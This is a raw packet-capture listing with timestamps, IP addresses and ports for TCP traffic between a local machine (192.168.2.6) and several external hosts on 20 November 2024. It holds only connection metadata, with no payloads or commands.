                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.047269106 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.047821045 CET49955443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.047826052 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.067487001 CET4434995620.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.067576885 CET49956443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071341038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071372032 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071388960 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071403980 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071419954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071429014 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071429014 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071436882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071480989 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071480989 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071608067 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071621895 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071636915 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071662903 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071676970 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071682930 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071682930 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071692944 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071711063 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071721077 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071722031 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071727037 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071743965 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071760893 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071767092 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071767092 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071780920 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071820974 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071824074 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071839094 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071866035 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071888924 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071890116 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071891069 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071908951 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071908951 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071926117 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071942091 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071943045 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071957111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071958065 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071965933 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.071986914 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072000980 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072000980 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072000980 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072020054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072036982 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072038889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072038889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072062969 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072066069 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072081089 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072097063 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072103977 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072115898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072124958 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072171926 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.072171926 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076658964 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076675892 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076684952 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076752901 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076812983 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076837063 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076853991 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076869965 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076884985 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076885939 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076905012 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076920986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076925039 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076925039 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076936960 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076952934 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076960087 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076960087 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076971054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076982021 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.076997995 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077014923 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077014923 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077014923 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077030897 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077047110 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077055931 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077055931 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077064991 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077080965 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077084064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077084064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077101946 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077102900 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077120066 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077131987 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077131987 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077136993 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077157974 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077166080 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077167034 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077193022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077208996 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077208996 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077224970 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077239990 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077244043 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077244043 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077255964 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077272892 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077276945 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077276945 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077289104 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077291012 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077306986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077322960 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077326059 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077326059 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077338934 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077348948 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077357054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077368021 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077373981 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077389956 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077389956 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077390909 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077408075 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077424049 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077428102 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077428102 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077439070 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077455044 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077459097 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077459097 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077471972 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077488899 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077497959 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077497959 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077512980 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.077536106 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.123081923 CET4434996320.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.123393059 CET49963443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.123420000 CET4434996320.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.123784065 CET4434996320.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125025034 CET49963443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125091076 CET4434996320.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125154972 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125289917 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125303984 CET49963443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125307083 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125324011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125332117 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125341892 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125359058 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125365019 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125375986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125392914 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125407934 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125421047 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125421047 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125435114 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125447989 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125461102 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125477076 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125493050 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125494003 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125510931 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125526905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125535011 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125535965 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125545025 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125560045 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125560999 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125579119 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125591993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125657082 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125670910 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125674009 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125722885 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125722885 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125771046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125787973 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125802994 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125818014 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125833988 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125860929 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125860929 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125926018 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125941038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125957966 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125972986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.125994921 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126000881 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126000881 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126032114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126032114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126096010 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126112938 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126126051 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126141071 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126157045 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126171112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126179934 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126179934 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126185894 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126209974 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126214027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126241922 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126241922 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126261950 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126277924 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126277924 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126277924 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126295090 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126311064 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126321077 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126321077 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126327038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126341105 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126352072 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126352072 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126358986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126369953 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126377106 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126394033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126406908 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126421928 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126421928 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126468897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126913071 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126928091 CET49962443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.126935005 CET49959443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.128623009 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.128643990 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.128691912 CET49959443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.128710032 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.128772974 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.129055977 CET49959443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.129889011 CET49959443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.129904032 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.130354881 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.130402088 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.130434990 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.130494118 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.130944967 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.130956888 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.131211042 CET49957443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.131226063 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.131774902 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.132913113 CET49957443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.132986069 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.133111000 CET49957443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.143182039 CET4434996223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.143573046 CET4434996123.200.3.19192.168.2.6
